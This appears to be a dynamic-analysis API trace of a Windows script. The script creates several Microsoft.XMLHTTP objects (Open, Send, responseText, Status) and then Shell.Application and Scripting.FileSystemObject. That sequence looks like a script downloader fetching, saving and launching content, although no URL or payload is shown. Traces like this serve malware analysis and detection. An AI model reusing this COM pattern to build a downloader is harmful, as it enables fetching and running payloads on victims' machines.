	[0254.719] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0254.719] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0254.719] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5be8) returned 0x0
	[0254.719] ??2@YAPEAX_K@Z () returned 0x62f330
	[0254.719] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5be8, pUnkSite=0x62f330) 
	[0254.719] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0254.719] XMLHTTPRequest:IUnknown:Release (This=0x49c5be8) returned 0x0
	[0254.719] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0254.719] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0254.719] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0254.719] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0254.719] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0254.719] longjmp () 
	[0254.720] longjmp () 
	[0254.720] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0254.720] SysStringLen (param_1=0x0) returned 0x0
	[0254.720] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0254.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0254.720] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c30) returned 0x0
	[0254.720] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0254.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0254.720] ??2@YAPEAX_K@Z () returned 0x62f310
	[0254.720] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0254.720] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0254.720] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0254.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c30) returned 0x0
	[0254.720] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c30) returned 0x3
	[0254.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0254.720] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0254.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0254.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0254.721] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0254.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0256.397] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0256.397] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0256.397] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0256.398] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0256.398] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0256.398] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0256.398] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0256.398] SysStringLen (param_1=0x0) returned 0x0
	[0256.398] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0256.398] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0256.398] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0256.398] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0256.398] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0256.399] ??2@YAPEAX_K@Z () returned 0x62f350
	[0256.399] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0256.399] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0256.399] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0256.399] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0256.399] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0256.399] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0256.399] SysStringLen (param_1=0x0) returned 0x0
	[0256.399] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0256.403] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0256.403] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0256.403] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0256.403] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0256.403] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0256.403] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0257.053] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0257.053] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0257.053] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0257.055] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0257.055] SysStringLen (param_1=0x0) returned 0x0
	[0257.055] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0257.055] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0257.055] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c30) returned 0x0
	[0257.055] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0257.055] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0257.055] ??2@YAPEAX_K@Z () returned 0x62f310
	[0257.055] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0257.055] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0257.055] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0257.055] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c30) returned 0x0
	[0257.055] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c30) returned 0x3
	[0257.055] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0257.055] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0257.058] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0257.058] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0257.058] SysStringLen (param_1=0x0) returned 0x0
	[0257.058] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0257.058] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0257.058] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7520) returned 0x0
	[0257.058] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0257.058] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0257.059] ??2@YAPEAX_K@Z () returned 0x62f330
	[0257.059] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f330) 
	[0257.059] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0257.059] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0257.059] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7520) returned 0x0
	[0257.059] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7520) returned 0x3
	[0257.059] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0257.059] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7520, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0257.059] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0257.059] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0257.059] SysStringLen (param_1=0x0) returned 0x0
	[0257.059] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0257.060] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
